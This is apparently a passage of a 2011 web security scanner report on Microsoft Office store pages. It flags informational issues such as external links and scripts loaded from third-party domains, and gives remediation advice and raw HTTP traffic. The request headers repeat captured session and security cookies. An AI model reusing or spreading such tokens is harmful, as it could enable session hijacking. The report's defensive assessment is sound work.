</noscript>
...[SNIP]...

4.2. http://www2.buyoffice.microsoft.com/usa/promotion.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/promotion.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/office-home-and-student-FX101845698.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b476b6d6346654e564530766873524f455753676b665970464852784e70374b6e6e6b725732635731316a412f366a34784c6c2b2f5061705a6d52434153316c39553d; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:54 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:54 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
</script>
       
       
       <link rel="SHORTCUT ICON" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/favicon.ico" />
       <link id="ctl10_cl1" href="http://.buyoffice.microsoft.com:8700/usa/promotion.aspx&amp;culture=en-us&amp;sku=10234528" rel="canonical" />
...[SNIP]...
<!-- Home and product page changes -->


               <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/style.css" />


   <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/promotion.css" />


<![if !IE]>
   <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/ff.css" />
<![endif]>
<link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/en-US/css/layout-mods.css" />
<!--[if IE 6]>
...[SNIP]...
<![endif]-->

       
       <script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery.tools-1.1.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/TrackByAjax.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-latest.pack.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/superscript.js"></script>


<script type="text/javascript" src="//nexus.ensighten.com/microsoftstore/Bootstrap.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_promotion_contentBody.js"></script>


<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/js/PPRSAEnc.js"></script>

<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/JSPublicKey.srf"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/MSLiveIdUtils.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/mtagconfig-2.1.js"></script>
...[SNIP]...
</script>


<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/framework/js/submitthrottle.js" type="text/javascript"></script>
...[SNIP]...
<div class="customServTop">
               <img alt="" usemap="#topMap" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/custServOverlayTop.jpg" />
               <div class="title">
...[SNIP]...
<a href='http://office.microsoft.com' target="_blank">
           <img title="Microsoft.. Office" alt="Microsoft.. Office" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/office_logo.png" />
       </a>
...[SNIP]...
<a href="javascript:submitSearch();"><img title="Search" alt="Search" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/search_button.gif" /></a>
...[SNIP]...
<div class="image">
                                           <img title="Office Home and Student 2010" alt="Office Home and Student 2010" class="searchresultimage" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/10234528.png" />
                                       </div>
...[SNIP]...
<div class="msLogo">
                                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/logo_icon.png" />
                                       </div>
...[SNIP]...
<div class="msLogo">
                                               <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/logo_icon.png" />
                                           </div>
...[SNIP]...
<div class="promoProdImage">
                                               <img title="Publisher 2010" alt="Publisher 2010" class="searchresultimage" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/search_images/10234422.png" />
                                               <div class="promoProdPrice">
...[SNIP]...
<div class="green_btn_sml_prod">
                                                       <img alt="" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />
                                                           <span class="buttontypeName">
...[SNIP]...
<div class="logo">
   <img src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/logo_microsoft.gif" alt="Microsoft" title="Microsoft" border="0" />    
</div>
...[SNIP]...
</script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrendsasyncloader.js" type="text/javascript"></script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrends.js" type="text/javascript"></script>
<noscript>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="//m.webtrends.com/dcs4j59yd99k7m2wbr9i6h2as_1d9y/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/basket.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /usa/basket.aspx?cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828193563:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:01:51 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 22:01:51 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:01:51 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<![endif]-->

       
       <script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery.tools-1.1.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/TrackByAjax.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-latest.pack.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/superscript.js"></script>


<script type="text/javascript" src="//nexus.ensighten.com/microsoftstore/Bootstrap.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_basket_contentBody.js"></script>


<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/js/PPRSAEnc.js"></script>

<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/JSPublicKey.srf"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/MSLiveIdUtils.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/mtagconfig-2.1.js"></script>
...[SNIP]...
</script>


<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/framework/js/submitthrottle.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrendsasyncloader.js" type="text/javascript"></script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrends.js" type="text/javascript"></script>
...[SNIP]...

5.2. http://www2.buyoffice.microsoft.com/usa/error404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/error404.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /usa/error404.aspx HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828518287:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; 